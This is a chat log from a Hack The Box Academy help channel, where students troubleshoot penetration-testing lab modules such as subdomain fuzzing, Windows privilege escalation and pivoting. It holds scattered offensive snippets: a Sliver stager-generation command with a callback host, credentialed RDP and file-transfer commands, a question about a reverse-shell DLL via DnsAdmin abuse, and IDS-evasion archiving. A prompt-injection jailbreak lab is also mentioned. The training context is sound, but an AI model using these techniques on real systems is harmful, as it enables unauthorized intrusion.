#modules

Help articles >>>>>>> FAQ took me 5 seconds to find the relevant help article

@tame sky Please take care to not post content for modules above tier 0

Hm not sure what you mean, its going to execute as the entity of the update service on ||backup|| probably nt/system.

Hey can anyone help? I am on the Wifi penetration testing basics module and I have made it to the connecting to wifi networks submodule and I am trying to complete the last question. I went into the freerdp mode and tried to connect to HTB corp and i put in the password and username but it does not connect it keeps telling me to connect. So I went the route of terminal and made a conf file as they showed in the reading but for some reason when I do suplicant it doe snot come up with what is shown in the reading and i can go no further. i am unable to connect to HTB corp.

$USD. But I think I shall

Will start selling pics to fund my career

Does running dhclient not get you an IP address on that AP network?

Hi everyone, Im on the first skill assessment on the Windows Privesc module. Ive got a reverse shell but i cannot find the creds for ldapadmin. I've tried running ||SessionGopher, LaZagne, and about 15 findstr/dir/select-string commands|| but cannot get these creds. Any hints you can offer to point me in the right direction?

Go ahead and get through questions 3 and 4, then circle back and get that answer.

that. makes. sense. 😂 . Thank you for letting me know ricky! @gray yacht

Hi Everyone. I am currently working on the Information Gathering - Web Edition module and am stuck on the Skills assessment. Currently working on questions 3,4,5 and have realized that I need to brute force the subdomains to look at robots.txt file but I cant seem to get any subdomains. I have tried using gobuster, dnsenum, and ffuf with the SecLists wordlists but have no luck. Any suggestions?

can I dm one of you about this? having the same problem

Sure

are you using the -fs switch?

when running ffuf

Ya I checked the size of the target with wc -c and include that number in my ffuf query

What did you do exactly with ffuf?

Did you map the host?

Trying different word lists within the DNS folder and setting the host to fuzz.inlanefreight.htb. Set -fs to 120 based on the size of the target

I tried accessing the robots.txt file of the target but got a 404 error so I’m under the impression I might need to access the robots.txt file of one of the subdomains

So you did, echo "<TARGET_IP> <SUBDOMAIN>" | sudo tee -a /etc/hosts ?

I haven’t found the subdomain yet to update the hosts file

Oh, my bad for getting ahead there

Can you reach the machine? (ping it)

Ya which is why I’m confused

And if so, what exactly did you run for fuff?

ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://inlanefreight.htb:32417 -H "Host: FUZZ.inlanefreight.htb" -fs 120

I updated my host file with the targets ip as well

I was wondering if I need to use a different wordlist repo than Seclists

Yes, it's worth trying different wordlists

If you recall in the secions there were bigger wordlists used also

Where did you get your 120 from, exactly?

I ran a wc -c when I curled the target. Reason behind this is I found that when I ran the ffuf without it I would get many default responses and eliminated those with the fs switch.

What tier is it?

What do you mean by tier?

Your box/challenge

Is it tier 0 or higher?

Rules here are "Discuss all modules here, from the fundamentals to the really mentals, but do not spoil module content over Tier 0."

Tier 1 I believe

I could give you a command to try but idk if thats breaching it here or not

@waxen totem Can I give him a curl command or does that count as spoiling?

anything goes just not giving answers/writeups directly

Ah ok, thanks

instead of doing that you're probably better off looking at the ffuf output and sussing out the common parameter among the responses and filter that out.

Try to verify your 120:

curl -s -I http://inlanefreight.htb:32417/ -H "Host: random123.inlanefreight.htb" | grep -i "Content-Length"

i.e. if they all return a length of 420 you'd -fs 420 or if they all returned 304 codes you'd -fc 304

I will def try this instead. Don’t know why I didn’t think of that

i just friend requested you cause I think you have DMs off

Thanks

Check out other wordlists also aside from namelist.txt

Do you mean the other wordlists within DNS directory or in another one

Yes. Both the section on subdomain enumeration and vhosts have used different wordlists also.

Under /usr/share/seclists/Discovery/DNS/ also.

Got it. Thanks for the suggestion

Welcome! GL and have fun. That was a nice assessment.

hi i am new to this server can you help me there are a lot of tab pls @waxen totem

What do you need help with?

about this server i am in the intro to htb module and there are lot of tab here so can you explain about this server for me pls?

and sorry for late on my side eletricity was out so sorry for that]

The server just has channels related to the topic of that channel.

Look at the pinned comments they generally say what the channel is about

and what are red and blue team? and where is the pinned comments?

Quick followup on my previous thread - I checked my ffuf output and confirmed the size is 120. I continued trying different lists in DNS and Web-Content as @ebon coral suggested and still had no luck. Im currently attempting to find directories instead of vhosts and used all of the directory lists in Web-Content with feroxbuster to try to find a directory that I can search in further with no luck. Can someone lmk if Im on the right path or if I need to step back and simplify my process. Thanks

hello can you tell me about red and blue team

Mention lab’s name
And what are you willing to do?

hello can you tell me about red and blue team

It’s the information gathering- web edition skills challenge at the end of the module

Ok maybe try to filter the output size thay you keep getting

I filter it to exclude size 120 and don’t get any other output sizes

The issue is I can’t find any of the targets subdomains

https://en.wikipedia.org/wiki/Red_team
https://en.wikipedia.org/wiki/Blue_team_(computer_security)

thank you

Hello, advanced sql injections skills assessment lab is very slow, i made boolean based sqli attack to find stuff, i receive only timeout errors.

hi for promp injection attack http://127.0.0.1:5000/prompt_inject/jailbreak_2
i can process to this but i cannot get the flag

What lists have you tried for vhost/subdomain enumeration? vhost/subdomain enumeration is the right track.

solved, thanks

https://academy.hackthebox.com/app/module/241/section/2637

Is the command in the readable really correct?
generate stager --lhost 10.10.14.62 --lport 4443 --format csharp --save staged.txt

Yes, but for a specific version of Sliver and will not work on the latest version to my knowledge

Hello, did you manage to get it working? I am facing similar issue

https://academy.hackthebox.com/app/module/77/section/843
i scanned and i know it was WordPress 5.6.1 and Apache/2.4.41, i tried to search on google and i found some cve, but when i search on msf or searchsploit, i cant find any script to exploit.

You're overthinking it

Load up the webpage

Visit it in firefox/browser

Hello, I have a question regarding hashcat rules. When is the appropriate context that would require incorporating the rules and how does one start finding out which rule is most appropriate for a given situation and why?

hey guys, I'm in https://academy.hackthebox.com/app/module/158/section/1438 . my ICMP connection is up with ptunnel-ng, but I can't connect to the DC. I tried "proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123 " and rdesktop too but they dont work!

When password complexity is a requirement

oh

let me try

ah ok. and is there a good rule of thumb to follow for a given password requirement? it seems like there are numerous .rulefiles and I'm lost on which one to go use

if you have access to RPC you can pull the pw requirements

neat, thank you for the info

If i recall correctly the password attacks module goes over the specific RPC command, if not it's common services

I will review the module, thanks

Hello🤗. I am stuck at hack the box's module ANDROID FUNDAMENTALS. I am facing problem in last section where we have to find the uid of application.need a bit help.Your cooperation will be appreciated.

Hi guys, anyone has done Skills Assessment I from Introduction to Windows Evasion Techniques?

In DNS I tried all 3 top-1-million, deep magic, sorted combined, combined, bug bounty, and fierce hotlist. In Web-Content I tried every list with the word 'directory' in it as I was attempting to use Feroxbuster to find hidden directories

I have gone back to using gobuster as well and keeping the query simple but havent found any other vhosts

what module/section?

This is for Information Gathering Web edition the skills assesment last 3 questions

I was wondering whether I should start looking for directories because the 3rd question mentions that the admin directory is hidden. Would running a gobuster -dir with a web-content wordlist be a better path?

yeah you're missing something obvious for the hidden directory; 🤖 (this is the hint)

Are you referencing the robots.txt file? Because I tried curling it and got a 404 error

then you're not on the right subdomain

The issue is that I havent found any subdomains

iirc i just used the basic subdomain list; using host headers in FFUF with the following switch -H "HOST: FUZZ.inlanefreight.htb"

I think ive been overcomplicating it since ive been stuck on it for so long. But I used gobuster and ffuf with most of the DNS subdomain lists and didnt discover any subdomains. Ex: ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://inlanefreight.htb:31335 -H "Host: FUZZ.inlanefreight.htb" -fs 120

i don't recall it being that difficult; are you getting any errors in your ffuf output?

if i dont have an exclude clause i get many responses all with status =200 and size = 120 so i exculde all responses with size = 120. Other than that the ffuf runs with no output and shows as complete

i used the 110000 list iirc

I tried that one as well. Is it possible there’s something wrong with my query. I checked my connection and verified my hosts list is updated.

Dm me with the ffuf command you used

Hi everyone
I'm currently in the Bypassing Encoded References section in the web attacks module
I managed to solve the question at the end using a very primitive way using burpsuite. Can someone please show me the script which should also solve the lab in an alternative way ?

the module host discovery section 3/12

I'd remove that. That's a tier 1 module, and that's a lot of information.

Read the channel subject.

Thank you.

I will search for myself thank u

You can ask for advice without revealing so much information

Look at how others have posed their questions above

cool I will give you some commands

Module is network enumeration with nmap, the section is host discovery

the section I mean sorry

Module->book
Section->chapter

why here is giving us 7 ips okay and second photo give us 3 ips ?

and second question

You're just repeating what you pasted earlier

Good lord

sorry this is first time

Different potential networks with different potential hosts available

its same

look

I wouldn't look too deep into the example outputs tbh, as they are examples

My friend

yes

Im telling you

Don't look too deep into it

okay I'm sorry

You're overthinking an example

okay

thank you

The main thing that should be taken away is that you can use a file instead of an IP/hostname

so the firewall block it because the nmap uses -sn for echo icmp to know the hosts is active or not

That's not what -sn does

I suggest reading the documentation

-sn its disable scanning port

and give the devices are here or not

Its icmp, tcp 443, and tcp 80

Its not just icmp echo

how we know the device is there or not by sending the icmp echo

here what is says

The provided target environment is not always the same one they use for examples in the modules.

And not every device responds to icmp echo requests

becasue the fire wall block it

It can yes

how the ips inside the file

same we scanned

you know what I got it I understand

Again you're looking too deep into the example

The example is using a list of hosts instead of using a cidr notated scan (ip/24)

The fact that the list is the same as the first scan is irrelevant

hey guys I'm in the Pivoting Skill Assessment (https://academy.hackthebox.com/app/module/158/section/1441). I don't understand how can I transfer mimikatz.exe from my attack box to server01 (the real hostname is another one, I don't wanna do spoilers). I tried with "proxychains scp mimikatz.exe <user>@<ip>" and also the python server won't work. can anybody help me?

/drive:shares,/pwd

Xfreerdp ^

Its saved SO much time for me tbh

Guessing that you used rdp but I’m just guessing I would have to go the chapter/module

It is an rdp situation

Even if I don’t need it, it’s muscle memory at this point

Yeah

I actually broke my shares down into the windows and linux tools to transfer over

I really got it thank you

Was anyone able to use Snaffler on Credential Hunting in Network Shares? I tried for sometime and then used nxc to answer the questions

Just trying to understand how the tool works, but seems to be more of a headache than anything

I got it becasue its says in second line it depends the firewall if enable it or what if enable will you give the ips it if not it will block the requests

CYBERKW90@htb[/htb]$ sudo nmap -sn -oA tnet 10.129.2.18-20| grep for | cut -d" " -f5 10.129.2.18 10.129.2.19 10.129.2.20 this will give us from ip 18 to 20 bit ip right ?

https://academy.hackthebox.com/achievement/2332605/19 thank you @fathom pendant

I used 110000 list as well. The directory enum came after I did the subdomain.

after 5 days i finally completed the nmap module

Yes that'll give that range

Snaffler can be unintuitive at first but all it does is regexp through shares it finds for useful information

With a ranking system of Black -> super important
Red -> important
...

I forget the whole system but its on their gh from what I recall

Yeah I used their GH to try to understand the commands and I couldn't really understand them

I finally figured it out. Thanks for help tho

Nice 👍

I have question about -sn it will send packets ARP so it will tell the ip which one alive right without -sn used -PE it will be icmp request respon right ?

Hey, could anyone help me with the Broken Authentication skills assessment? I'm past the initial phase but stuck on a part where I'm not sure what I'm doing wrong. I'd rather not post the details here in case it spoils anything for others — is it okay to share?

for DP-SGD challenge, I encountered this error

Traceback (most recent call last):
  line 247, in <module>
    mia_acc, mia_adv = compute_mia_advantage(

typeError: cannot unpack non-iterable NoneType object```

use this for convenience https://github.com/zh54321/SnafflerParser

yes i already found the subdomains but still confused till rn

@ebon gulch Please don't reveal content from modules above tier 0, especially answers for skill assessments

So basically, academy modules are still outdated? I can't believe I still got this frustration after more than 2 years. 🤦‍♂️ 🤦‍♂️ 🤦‍♂️

At the time of writing that was the most recent version of Sliver

You can DM me

Hi, I'm stuck on the first question of the “WordPress Hacking” module. I have to admit I don't understand the problem. I'm asked to find a file named flag.txt by searching through all the directories. I think I've gone through the entire site but haven't found anything. I’ve opened every folder I could find, and I’ve run scans with HackerTarget, WPScan, and Nuclei. I tried entering URLs directly into the file, but I haven’t found anything except for the flag from question 2. Can someone explain the trick to me?

Goodmorning, i am working on the Preprocessing the Malware Dataset in the Applications of AI in InfoSec, when i run the TARGET_BASE_PATH command after the split folders command, i am not seeing the directory via linux, i see it on jupyter, but the walkthrough suggests i should be seeing it on my attack box.
Does anyone know if i am missing something, i feel like i am. The directory created is supposed to be 'newdata' along with three subdirectories

Hi everyone. I'm looking for help to complete the last question of the "Active Directory Trust Attacks" module skills assessment. I'm stuck on this for a while now. DM me, please, if you can help! Thanks in advance and have a great day.

Assuming you're working an identified attack path, if you're just trying it from windows I would also try it from Linux.

All I could get is a .ccache file for the DCXX$ user. Nothing seems to work from Linux, and I can't get access to Windows with that user. I'm probably missing something obvious...

Shoot me a DM.

hey guys, still struggling with file transfers.. I'm doing the Password Attacks Skill Assessment (https://academy.hackthebox.com/app/module/147/section/1356) and I'm at the end, where on the DC I created a shadow copy of c: to get the ntds.dit. before I can dump the administrator hash with impacket-secretsdump I gotta transfer the ntds to my attack box (3 hops from the DC). can anybody help me?

I recall I was able to pass around files using smb shares. Also some rdp clients allow copy and pasting files.

use an http server

python3 -m http.server 8080 #or whatever port isn't being used that you can use

my best advice is to try to log in evil-winrm and then use download file.txt. That's it 🙂

Hi, I'm stuck on the first question of the “WordPress Hacking” module. I have to admit I don't understand the problem. I'm asked to find a file named flag.txt by searching through all the directories. I think I've gone through the entire site but haven't found anything. I’ve opened every folder I could find, and I’ve run scans with HackerTarget, WPScan, and Nuclei. I tried entering URLs directly into the file, but I haven’t found anything except for the flag from question 2. Can someone explain the trick to me?

you need to gain RCE on the host

stating it doesn't seem to ask me for an RCE

hello guys i have some problem with XSS module Session Hijacking section can i dm someone?

you got it

is it this question "Keep in mind the key WordPress directories discussed in the WordPress Structure section. Manually enumerate the target for any directories whose contents can be listed. Browse these directories and locate a flag with the file name flag.txt and submit its contents as the answer."

Yes it's the one

okay i just ran through the module real quick, did you spawn the target?

I think so

but I'll go and check

after you check, are you going to that web page of the ip and port that spawned?

OK, it's my fault – I wasn't aiming at the right target

Sorry for wasting your time, and thanks for your help. I've managed to display the target, and now I'm running the enumeration again.

honestly to get the flag i didn't run any commands, i just went to webpage and enumerated the directories real quick

OK, I'll do that

following the path of the above curl command right above the question using the target instead of the webpage mentioned

ok ty for help

np

From the pwnbox, I'm running xfreerdp to connect to a target machine but that xfreerdp screen is too small and it doesn't seem to have an option to maximize the screen (or is there?). Is there a way to increase screen borders?

Bug: sqlplus not installable on Pwnbox — Oracle TNS question cannot be completed as documented

Module: Footprinting
Section: Oracle TNS (Section 15)
Question: "Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer."

Issue:
The walkthrough instructs students to connect to the Oracle database using sqlplus after finding credentials with odat. However, sqlplus is not installed on the Pwnbox and cannot be installed via apt-get. The package oracle-instantclient-sqlplus does not exist in the available repositories.

Running:
sudo apt-get install oracle-instantclient-sqlplus
Returns: E: Unable to locate package oracle-instantclient-sqlplus

Running locate sqlplus only returns Metasploit plugin files — not a usable sqlplus binary.

Steps to reproduce:

1. Spawn the Oracle TNS target
2. Complete the full odat install (cx_Oracle + odat dependencies)
3. Run odat to find credentials (scott/tiger confirmed)
4. Attempt to run: sqlplus scott/tiger@[IP]/XE as sysdba
5. Result: bash: sqlplus: command not found

Impact:
The final step of the lab — connecting to Oracle and querying sys.user$ for the DBSNMP hash — cannot be completed using the documented method. The walkthrough assumes sqlplus is available but provides no install instructions for it.

Please use #1234357888114364508 to report issues like this

Hello! Were you able to get an answer to your question in the end? I'm stuck in the same boat, just can't bypass that "Blocked data exfiltration attempt" message

Yes

You can ping me

I am currently Woring on the "Introduction to Windows Module". The challenge is "Which Windows NT version is installed on the workstation". I used powershell and I am quiet convinced, that the approach is correct... but I can't get the answer to work. Anyone could give me a hint here?

You won't believe it lol, literally 2mins after I wrote the message, I got it For everybody else struggling, poems are cool too you know

Aaaaahhh omg.... figured it out!

Guys why I cant see vpn file to download in the module in order to connect?

Hi anyone available I am stuck in CDSA path Introduction to Malware Analysis > Code Analysis > Debugging exercise: Reproduce all the debugging procedures mentioned in this section and provide the hidden shellcode-related hex values from the final screenshot as your answer. Remove all spaces.

I have followed the exercise but still getting sandbox detected. If anyone is available for help would be great thank you!

It's available in the VPN tab, which is next to the Pwnbox tab, when you are on a page that has an interactive section

It wasnt showing due to the adblocker. I’ve turned it off and it appeared

Solved!

I’m currently at the metasploit module, writing & importing modules section. I’m not sure about the part about porting a ruby script into a metasploit module, feels complicated and I’m wondering if this is something that i should learn or just skip over?

It’s not explained that well too, it says I should refer to the metasploit documentation to know how to port a script. And it requires a good understanding of the ruby code in the script

use /dynamic-resolution

you don't need to worry too much about it

Good, cuz i feel like something like this needs a whole section with a step-by-step guide for it with questions at the end

It does, please don't post content above tier 0

Anyone who has done it doesn't need the additional context, and if you feel like you need to reveal a little more you can ask for a DM

you can ask your question just don't post the screen shots, it had a username and content from the module

Will someone please help me with the following. happy to discuss in DMs if you need additional info:

• Module: Attacking Common Services
• Section: Attacking Email Services
• Question 1: What is the available username for the domain inlanefreight.htb in the SMTP server?
• Used several of the enumeration methods to reach the inlanefreight.htb domain. Tried running a dig with the target IP included, added the target and domain name to my /etc/hosts, ran a nslookup, no return for inlanefreight.htb. I also ran the exact command the walkthrough suggested against the domain as well as the target machine. There is no scenario where I retrieve a user name. Also I am making sure to use the user and password list provided by the module resources.

Solved. Had to reset the machine 4 times. Wtf is that

I was having the same issues yesterday, i had to spawn in the US and it worked then , but now I've just tried on the EU and it worked maybe this one is a bit hit and miss

pls someone help me. i’m on footprinting modules DNS section. stuck on question 4🥲

DM me if someone can help

Can someone tell me what archiving a malicious file twice with password protection (both times) ultimately does? It says this is an IDS/IPS evasion technique. Is it supposed to make sure the file reaches the target and gets executed without being flagged?

I’m just confused about its end goal

Check dm

Hi, what the heck is that

learning the web proxies, i am already know it so i'm fast foward it by solving the lab, and get locked @@

solved it, i forget to turn off burp suite proxies :v

Lol

This ad blocker detected popup is super annoying and it slows HTB down even with Brave Shield / ad-blocking off. I would rather see an option in user settings to alert when adblock might be blocking something or make it less intrusive, because I expect 99% of the HTB users using a ad-blocker

Anyone got a solution here? I tend to think adding the ad block detected popup to the adblock blacklist as well because it keeps popping up even with adblocker disabled

I use CloudFlare secure DNS server, so no filtering there

Hi everyone, I am having trouble with installing eyewitness on htb academy, it keeps saying that the package is not found, when i try to install via gitclone, it said that cmake is not available and same thing when i try to sudo apt install cmake

would anyone know what to do?

Solved it with this tampermoney script (let me know if this is against TOS, but this is giving me technical issues, that's why I share it):

// ==UserScript==
// @name         Mute adblock detected modal on academy.hackthebox.com
// @match        https://academy.hackthebox.com/*
// @run-at       document-start
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

    try {
        sessionStorage.setItem('htb-adblockBannerDismissed', 'true');
        sessionStorage.setItem('htb-adblockDetected', 'true');
    } catch (e) {
        console.warn('[HTB silence] sessionStorage write failed:', e);
    }
})();

I think you might need dev tools on the linux distro you use - try sudo apt-get install build-essential cmake

I am using the pwnbox machine

Sounds like a technical issue or something you can't do from that machine then, maybe staff can dive into this

Yeahh, the attacking common web application was last updated 3 years ago.
Thanks for attempting to help. Who do I even tag for this help haha

At this point I need help. I've been on Skills Assessment - Password Attacks for days now. I got access to the JUMP01 server over RDP with the cred found in the DMZ server. I cracked one psafe hash found in the FILE server. All those don't seem to be useful in accessing anything, I need help!!

I need a gentle nudge in the right direction or someone I can dm... frustration is building up, been on it for several days.

@lost vessel i DMED you

hey guys, I'm doing the AD Skill Assessment II and I got stuck at the question "Use a common method to obtain weak credentials for another user". I tried everything (also password spraying with 3 different wordlists for the 1000 most common passwords). I eventually gave up and looked at some walkthrough, apparently everybody tried psw spraying "Welcome1" ... is this really the only method?? just guessing?

Good fellows... I am on the Linux Target section of the "Pentest in a nutshell" module. For some reason it isn't actually letting me ssh in the the private key. It still ask for the password.. anyone have this issue or have an answer.

ssh -i id_rsa john@10.129.233.210
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
john@10.129.233.210's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-135-generic x86_64)

• Documentation: https://help.ubuntu.com
• Management: https://landscape.canonical.com
• Support: https://ubuntu.com/pro

System information as of Thu Apr 23 01:43:31 PM UTC 2026

System load: 0.08
Usage of /: 81.5% of 13.68GB
Memory usage: 24%
Swap usage: 0%
Processes: 171
Users logged in: 0
IPv4 address for eth0: 10.129.233.210
IPv6 address for eth0: dead:beef::250:56ff:fe94:a637

Expanded Security Maintenance for Applications is not enabled.

it told you you have to chmod the file to 600

Hey gang! Has anyone noticed performance issues when trying to ping a HTB target? I'm working on the "Attacking Common Services" module, "Attacking Email" section. I start the target, connect to VPN, but I'm not able to ping the target. After waiting for a few seconds or a minute, it's able to ping, but then I can't ping it anymore. I've tried redownloading a new VPN profile, closing the browser and VM, etc...

I have a similar issue but I can't RDP to a host with Xfreerdp is there any other tool I could use? or did I set up something wrong

error message looks something along these lines "[15:50:14:881] [546575:00085710] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[15:50:14:881] [546575:00085710] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[15:50:29:905] [546575:00085710] [ERROR][com.freerdp.core] - [freerdp_tcp_default_connect]: ERRCONNECT_CONNECT_FAILED [0x00020006]
[15:50:29:905] [546575:00085710] [ERROR][com.freerdp.core] - [freerdp_tcp_default_connect]: failed to connect to 10.129.66.21
[15:50:29:905] [546575:00085710] [ERROR][com.freerdp.core.nego] - [nego_connect]: Failed to connect"

Use the command provided in the question inside the directory where applications are installed by default

are you talking about de Drozer section?

You need to change the permissions on the file id_rsa, like the error says. chmod 600 <id_rsa file location>

a in the Objection section XD. no, that works fine

Do you have multiple VPNs running? Try disconnecting from the VPN, reconnecting and trying to xfreerdp.

just thought about that since I had 2 tunnels running I killed OpenVPN and ran a new VPN

Now I have one tunnel running but no clue if that's normal or if that's an issue

Did xfree work on the new VPN?

nope

https://giphy.com/gifs/instagram-oh-no-nazoom-18gEqArCQNlo5zowZn

Lmao I kiilled tunnel 0 and im gonna retry now

@scenic arrow Fixed it I had Tun2 and Tun0 for some reason

im assuming the Network just didn't know which tunnel to use so it claimed the IP was innacesible

hey. are there plans to translate the academy to spanish?

just use a extension to translate lol

extensions often fail. I'm just asking lol.

All the info in spanish is very weird man. Just do English

Even some concepts

Dont make a lot of sense

You can use xfreerdp3

As the majority of academy (and HTB) users are English speakers I don't think there's plans any time soon to add translations

I didn't see where it said that, but thank you for the reply good fellow.

not sure why I missed that part of the error message. Thank you though.

Thanks for your help bro

Hi, is it possible to suggest changes/uplift to the Academy content? I'm looking to point a resource being offered under the "Advanced XSS and CSRF Exploitation" module to a more up to date, maintained resource doing the equivalent thing

#1234357888114364508

thank you

I'm on the intercepting web proxies module and my application seems to be different to the one in the demo

Probably it’s ok

https://specterops.io/blog/2026/04/11/bloodhound-course-update/

what you think ? htb is following updates ?

Hello, sorry if I am posting in the wrong place. I have a problem with Attacking WiFi protected setup (WPS)

I can’t pass these warnings

hey, can i dm about this,,i am stuck here too

my target isn't spawning its been on "Target spawning." for like 5 mins anyone having the same idea?

change vpn

https://academy.hackthebox.com/app/module/77/section/843
i tried to scan using nmap and curl, read it and notice nothing, nmap + search for wp exploit already and found nothing
thanks for your help

Is there even any other language available right now except english?

@tranquil wren can I send you a private message?

you ever get this to work? runing into the same issue

Hi all, doing introduction to ai red teaming, first question of the module. It asks to “Manipulate the fixed input message by appending data to trick the classifier into classifying the message as ham. Submit the flag you obtain after providing an input that satisfies the lab requirements.”

What is the fixed input message? I didn’t find it in the zip file. I used the message used as an example in the course, but no flag came back. Am I supposed to send the message to an API at the machine IP? There were no instructions for an API that I saw

Hey having some abnormal trouble getting through module "Pentest in a Nutshell" on a specific question not accepting the input for "What is the exact OS Version that WinPEAS delivers?"

Weird part is I've done everything WinPEAS, Starkiller, SILENTTRINITY, Sliver, and Merlin and all that happens at every point either it tells me 'insufficent' permissions and throws a 'DENIED' then the shell dies. Even went as far as changing my VPN Server.

That highlighted part is what they asked for and when provided it calls it incorrect.

Yo guys, im on win privesc, DnsAdmin group abuse section.

Not on computer rn, but the section was about using the dmscmd.exe utility, that the DnsAdmin group has privileges to set a reg value (name serverdll or similar thing), which accepts the path of any dll without verification, and that the dns server service runs as SYSTEM, once the dns server restarts it executes the dll

The section used a payload dll to add a user to the domain admins group

My question was (since likely the dns server is running in the DC itself) if i wanted to load a dll that returns a reverse shell, will the dns server start normally ? Like does the dll load as a sub process, or does it interrupt the dns process and therefore cause problems ?

Hey, I’m having trouble connecting to DC01 in the Windows Attack and Defense lab. The machine doesn’t seem to respond, and I’m unable to establish an RDP connection. Could you please check if the instance is running or if there’s any issue with the lab environment?

i have pinnged the dc01 ip and now response

Labs are private instances, no one can check except support on the website. Since it's the weekend you won't get a response till the business week. Most likely it's something on your end, try killing all VPN processes, make sure you don't run the pwnbox and VPN at the same time, maybe redownload the VPN file and/or change regions or servers.

can someone help me in active directory enumeration and attacks skill assessment 1
im in the question Find cleartext credentials for another domain user. Submit the username as your answer.
||i have tried dumping lsass and the hash wasnt crackable and tried to hunt for credentials but also failed|| im stuck here

i have found the user but not the password

Hello everyone. I am new to HTB and just started my journey. currently im im trying to finish the network foundations course and am stuck on "What is the the name of the Program listening on localhost:5901 of the Pwnbox?" what i did: || i used nmap on 127.0.0.1 there the port is open and shown as vnc on the target its closed and also vnc.|| but the anser box refuses any variation of || vnc|| i can think of. can anyone tell me i f im thinking in circles or have encountered a bug? DMs regarding this are welcome.

Are you still stuck on this one?

Nope

Hi i'm on "Attacking Common Services - Easy"
I don't understand how I'm supposed to determine a valid login combination (||besides the SMTP login||), because whenever I try to use Hydra on any protocol, I get a lockout. And neither the specified pws.list, nor rockyou, nor any other lists are able to return a valid password

@abstract imp Careful about revealing content above tier 0. that's lot of spoilers for the challenge right there.

Hi everyone, I need help in this:-
In the web attacks module, percisely in the Chaining IDOR Vulnerabilities section.
the question is "Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page."

I'm not good at scripting so can someone help me do this manually if possible ?

hey, I just found a bug on the exercise from the module command injections (section Bypassing Other Blacklisted Characters). The ls command doesn't work and there is no error message from the filter contrary to whoami for example. I can't find the user

I doubt there is an issue, many people have completed that module, but if you feel there's an error in a module you can report it in #1234357888114364508

yo guys, im having this issue with smbclient:

_samba_cmd_set_machine_account_s3: failed to open secrets.tdb to obtain our trust credentials for WORKGROUP
Failed to set machine account: NT_STATUS_INTERNAL_ERROR

i tried different solutions but no lucl. anybody familiar with it ?

Have someone experienced the same issue while trying to connect to ssh ?

W terminal btw

the servers get laggy a bit at night

so dw

thx

i'll try to reset the target and see

Explorer.exe

I redownload another vpn file and respawn the target but nothing changed

I can ping the target tho and the port 22 is open so I don't know how to fix this

yo guys, im on win privesc, print operator group abuse. section states:

Next, from a Visual Studio 2019 Developer Command Prompt, compile it using cl.exe.
Compile with cl.exe

Microsoft (R) C/C++ Optimizing Compiler Version 19.28.29913 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.

EnableSeLoadDriverPrivilege.cpp
Microsoft (R) Incremental Linker Version 14.28.29913.0
Copyright (C) Microsoft Corporation.  All rights reserved.

/out:EnableSeLoadDriverPrivilege.exe
EnableSeLoadDriverPrivilege.obj

```however, running it i get:

** Visual Studio 2026 Developer Command Prompt v18.5.1
** Copyright (c) 2026 Microsoft Corporation

C:\Windows\System32>cl
'cl' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\System32>cl.exe
'cl.exe' is not recognized as an internal or external command,
operable program or batch file.

is that command deprecated on newer versions ? what is the replacement for it ?

Sounds like the binary isn't in your path, call to it directly like .\cl.exe

yeah i am doing AD powerview module and it is not accpeting the password

It's like forcing us to pay for using the pwnbox instead of the vpn

But the team will fix it for sure

Just wanted to mention, the Conditional Execution section of Introduction to Bash Scripting is extremely difficult on macOS because macOS and Linux base64 commands are slightly different, so without Googling a huge HTB forum thread about it where everyone is complaining and confused, it's impossible to do the challenge on macOS. Not sure if this could potentially be annotated or made clear somehow?

I suppose doing it on the Pwnbox would make it work fine, but I just spun up a .sh script locally since the exercise is so basic

i am already on gold annual what else they want from me man ? 😭

Hey guys, stuck on the footprinting easy challenge. Just wondering if I can help me out, wondering if the roadblock I hit is by design or something wrong.

sure. send me dm

the easy lab is just something simple, don't overthink it

Yeah I am trying to do something that technically we haven't learned in the CPTS path yet so, guessing it isnt' where I should be

yeah you don't need to do anything outside of what the module has shown

As I remember you don’t need to scripting
Just manipulate the request…

good practice to script though

Hiya, I'm working on the Skills Check assessment for the CDSA role path, under the Incident Handling module--and running into an issue where TheHive keeps logging me out after what seems like a very brief user session. I can't get more than a few clicks into the UI, glancing back over at my other monitor to read the question and back before seeing I'm already logged out again.

Is this something I need to check with my local browser settings or is this tucked away somewhere in TheHive UI?

Hi, I'm currently on Active Directory Enumeration and Attacks > Kerberoasting - from Linux. Having trouble with Qestion 2, finding the 'powerful local group' of the user we found out in Q1. I have seen a couple of ways to find out the groups a user is in but none are working. I can't use nxc ldap <ip> -u <username> -p <password> --groups "<group>" as nxc isn't installed on the spun-p machine. I also found sudo crackmapexec smb 172.16.5.5 -u <username> -p <password> -M groupmembership -o USER=<username> but errors out as 'module not found'. if anyone has another idea on how to answer this, please let me know

You can use bloodhound, or ldapsearch.

Thank you! Was hoping to do it through the tooling in the section but clealy wasn't going my way! I now have the answer through Bloodhound. Thank you again for the help!

Agree

This Introduction to Bash Scripting has nightmare fuel questions. Doing the Bash code takes 1 minute, followed by 2 hours of trying to understand why the base64 encoding is mismatched, whether it's supposed to encode phantom newlines, and no matter what you submit it's an invalid answer. ChatGPT also can't figure it out, but the question was simply to add an if statement and submit the last 20 chars.

Hello, could be off topic but is there any active coupon code for annual HTB academy subscription? i'm planning to subscribe but it's a bit expensive 😅

Module: Advanced XSS and CSRF Exploitation
Section: Skill Assessment
https://academy.hackthebox.com/app/module/235/section/2665

I found a sqli on api endpoint but I can't pull any data

